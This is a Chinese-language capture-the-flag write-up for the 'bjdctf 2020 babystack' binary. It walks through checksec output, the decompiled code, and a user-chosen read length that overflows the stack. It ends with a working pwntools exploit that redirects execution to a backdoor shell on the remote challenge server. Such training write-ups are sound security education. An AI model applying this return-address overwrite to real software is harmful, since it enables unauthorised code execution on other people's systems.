bjdctf 2020 babystack

前提

查看文件保护

[*] '/root/pwn/buuctf/bjdctf_2020_babystack/bjdctf_2020_babystack'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-10h]
  size_t nbytes; // [rsp+Ch] [rbp-4h]

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  puts("[+]What's u name?");
  read(0, &buf, (unsigned int)nbytes);
  return 0;
}

后门函数如下

__int64 backdoor()
{
  system("/bin/sh");
  return 1LL;
}

思路分析

1. 目前信息：
   • 明显的栈溢出漏洞
   • No PIE
   • 程序开启了NX保护
   • 存在后门函数
2. 思路：
   • 第一次输入的数据是第二次可读入数据的长度，可由此实现栈溢出，将返回地址覆盖为后门函数地址即可

exp

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/bjdctf_2020_babystack/bjdctf_2020_babystack'
io = remote('node4.buuoj.cn', 26068)
# io = process(pwnfile)
elf = ELF(pwnfile)
backdoor_addr = elf.symbols['backdoor']
offset = 0x10+8
io.sendlineafter('your name:', str(offset+8))
payload = flat(['a'*offset, backdoor_addr])
io.sendlineafter('u name?', payload)
io.interactive()